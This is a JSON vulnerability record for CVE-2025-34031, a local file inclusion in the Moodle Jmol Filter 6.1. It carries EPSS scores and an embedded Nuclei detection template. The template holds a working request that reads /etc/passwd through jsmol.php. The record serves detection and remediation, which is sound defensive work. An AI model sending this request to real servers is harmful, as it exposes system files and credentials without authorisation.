{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-34031/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-34031/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-34031/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-34031/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-34031/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-34031"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-34031"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.03007,
      "kev": false,
      "percentile": 0.86826
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-34031.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-34031\n\ninfo:\n  name: Moodle Jmol Filter 6.1 - Local File Inclusion\n  author: madrobot\n  severity: high\n  description: |\n    Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.\n  impact: |\n    Attackers can read arbitrary files from the server through the jsmol.php endpoint, potentially exposing sensitive configuration files and credentials.\n  remediation: |\n    Upgrade Moodle Jmol Filter to a patched version or remove the vulnerable plugin if not required.\n  reference:\n    - https://www.exploit-db.com/exploits/46881\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-34031\n  classification:\n    epss-score: 0.03007\n    epss-percentile: 0.86826\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N\n    cve-id: CVE-2025-34031\n    cvss-score: 7.5\n    cwe-id: CWE-22\n  metadata:\n    max-request: 1\n  tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: word\n        part: content_type\n        words:\n          - \"text/plain\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a00473045022100a2a7d3b3b1830af8faeea4e0fb7717dd8152b55606ddc63d7ce34ac39f5891c10220048fbb31426a87a76b7532aaa6597405061f3c88772c04d1c1e5c032ce974080:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-34031"
}